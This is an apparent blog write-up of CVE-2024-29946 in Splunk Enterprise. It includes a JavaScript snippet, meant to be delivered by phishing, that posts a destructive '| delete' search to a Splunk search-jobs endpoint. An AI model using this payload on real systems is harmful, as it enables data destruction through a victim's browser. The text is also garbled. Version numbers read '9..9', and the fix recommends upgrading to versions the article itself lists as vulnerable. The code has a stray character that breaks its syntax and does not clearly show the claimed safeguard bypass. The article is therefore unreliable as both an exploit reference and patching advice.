CVE-2024-29946: Bypassing SPL Safeguards in Splunk Enterprise's Dashboard Examples Hub

Recently, a security vulnerability (CVE-2024-29946) has been found in Splunk Enterprise versions 9..9 and below, 9.1.4 and below, and 9.2.1 and below. This version's Dashboard Examples Hub is found to lack crucial protections for risky SPL (Search Processing Language) commands. A potential attacker could exploit this vulnerability by bypassing the SPL safeguards for risky commands present in the Hub. To do so, the attacker would need to carry out a phishing attack and trick the victim into initiating the request from their browser. In this article, we will delve into the technical details of the CVE-2024-29946 vulnerability and demonstrate a sample code snippet for the exploit.

Exploit Details

The security issue (CVE-2024-29946) arises due to insufficient protection for potentially dangerous SPL commands in the Dashboard Examples Hub. The below code snippet demonstrates how an attacker could bypass the SPL safeguards to execute a risky command.

//Sample Code Snippet
<script>
  function exploit() {
    var xhr = new XMLHttpRequest();
    xhr.open('POST', 'https://<SPLUNK_ENTERPRISE_INSTANCE>/en-US/splunkd/__raw/services/search/jobs';, true);
    xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    var payload = 'search=%7C%20delete&exec_mode=normal';
    xhr.send(payload);
  }
  exploit();
</script>

The code snippet above shows a simple JavaScript function, exploit(), which sends an XMLHttpRequest (XHR), POST request to create a new search job on the Splunk Enterprise instance. The payload, which is sent as the search parameter in the POST request, contains the risky SPL command, 'delete' in this case. When this exploit is executed, the deletion command will bypass the SPL safeguard within the Dashboard Examples Hub, leading to potential data loss or other dangerous outcomes.

To protect yourself from this vulnerability, do the following

1. Upgrade to Splunk Enterprise versions that are not vulnerable to CVE-2024-29946, which include 9..9 or higher, 9.1.4 or higher, and 9.2.1 or higher. Please check the official Splunk Security Advisory for more information: Splunk Security Advisory for CVE-2024-29946

Conclusion

CVE-2024-29946 is a significant security vulnerability that can allow attackers to bypass SPL safeguards in the Dashboard Examples Hub of the affected Splunk Enterprise versions. By leveraging phishing techniques, hackers can exploit this vulnerability to execute risky SPL commands, potentially causing detrimental consequences. It is recommended to upgrade to the latest, patched Splunk Enterprise versions and to be extra cautious against phishing attacks to mitigate the risks associated with this security flaw.

Timeline

Published on: 03/27/2024 17:15:54 UTC
Last modified on: 04/10/2024 01:15:18 UTC